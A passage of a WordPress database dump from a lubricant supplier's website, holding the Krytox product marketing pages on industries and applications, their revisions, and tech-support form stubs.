performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<a name="elec"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Electronics/Semiconductor</strong></span>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<a name="food"></a>\r\n\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Food Processing</strong></span>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<a name="med"></a>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Medical Industry Equipment Applications </strong></span>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<a name="metal"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Metal Processing </strong></span>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n<a name="oxy"></a>\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Oxygen and Reactive Gas Service </strong></span>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<a name="power"></a>\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Power Generation</strong></span>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<a name="pulp"></a>\r\n\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Pulp and Paper</strong></span>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<a name="text"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Textile</strong></span>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<a name="tire"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Tire Mold</strong></span>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]\r\n\r\n&nbsp;\r\n\r\nTo see our entire line of Krytox products please visit: <a href="https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/">https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/</a>', 'Krytox Lubrication Overview', '', 'publish', 'closed', 'closed', '', 'krytox-lubrication-overview', '', '', '2016-09-29 19:14:23', '2016-09-29 19:14:23', '', 0, 'https://www.miller-stephenson.com/?page_id=2058', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (2059, 1, '2016-09-28 13:46:05', '2016-09-28 13:46:05', '[ninja_form id=11]\r\n<BR>\r\n<BR>\r\nFor more URGENT requests, please call us at: 800-992-2424 (8-4 EST)', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-09-28 13:46:05', '2016-09-28 13:46:05', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2060, 1, '2016-09-28 13:49:23', '2016-09-28 13:49:23', '<H3>For more URGENT requests, please call us at: 800-992-2424 (8-4 EST)</H3>\n<BR>\n<BR>\n[ninja_form id=11]\n', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-autosave-v1', '', '', '2016-09-28 13:49:23', '2016-09-28 13:49:23', '', 122, 'https://www.miller-stephenson.com/122-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2061, 1, '2016-09-28 13:49:25', '2016-09-28 13:49:25', '<H3>For more URGENT requests, please call us at: 800-992-2424 (8-4 EST)</H3>\r\n<BR>\r\n<BR>\r\n[ninja_form id=11]\r\n', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-09-28 13:49:25', '2016-09-28 13:49:25', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2062, 1, '2016-09-28 13:50:32', '2016-09-28 13:50:32', ' ', '', '', 'publish', 'closed', 'closed', '', '2062', '', '', '2017-08-18 15:11:22', '2017-08-18 15:11:22', '', 0, 'https://www.miller-stephenson.com/2062/', 13, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (2063, 1, '2016-09-28 13:54:14', '2016-09-28 13:54:14', '<BR>\r\n<H3>For URGENT requests, please call us at: 800-992-2424 (8-4 EST)</H3>\r\n<BR>\r\n<H4>Techincal Support Request Form:</H4>\r\n[ninja_form id=11]\r\n', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-09-28 13:54:14', '2016-09-28 13:54:14', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2064, 1, '2016-09-28 13:54:36', '2016-09-28 13:54:36', '<H3>For URGENT requests, please call us at: 800-992-2424 (8-4 EST)</H3>\r\n<BR>\r\n<H4>Techincal Support Request Form:</H4>\r\n[ninja_form id=11]\r\n', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-09-28 13:54:36', '2016-09-28 13:54:36', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2065, 2, '2016-09-28 14:02:50', '2016-09-28 14:02:50', '', 'Videos', '', 'publish', 'closed', 'closed', '', 'videos', '', '', '2016-09-28 14:02:50', '2016-09-28 14:02:50', '', 0, 'https://www.miller-stephenson.com/?post_type=ywtm_tab&#038;p=2065', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (2067, 11, '2016-09-28 14:19:40', '2016-09-28 14:19:40', '', '', '', 'publish', 'closed', 'closed', '', '2067', '', '', '2016-09-28 14:19:41', '2016-09-28 14:19:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/2067/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2068, 2, '2016-09-28 15:55:16', '2016-09-28 15:55:16', ' ', '', '', 'publish', 'closed', 'closed', '', '2068', '', '', '2016-09-28 15:55:16', '2016-09-28 15:55:16', '', 0, 'https://www.miller-stephenson.com/2068/', 9, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (2069, 2, '2016-09-28 15:55:16', '2016-09-28 15:55:16', '<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">[button size="medium" style="secondary" text="Medium button" link="https://" target=""]Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes General Applications</li>\r\n 	<li>Bearings—all types • Seals—valves and pumps • O-rings—sealants, lubricants Aerospace-Specific Applications • Oxygen systems—valve and pump packing seals, mechanical seals, and connectors • Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure • Actuators—mechanical/gear-type actuators for control valves and systems • Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 15:55:16', '2016-09-28 15:55:16', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2070, 2, '2016-09-28 15:56:20', '2016-09-28 15:56:20', '<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes General Applications</li>\r\n 	<li>Bearings—all types • Seals—valves and pumps 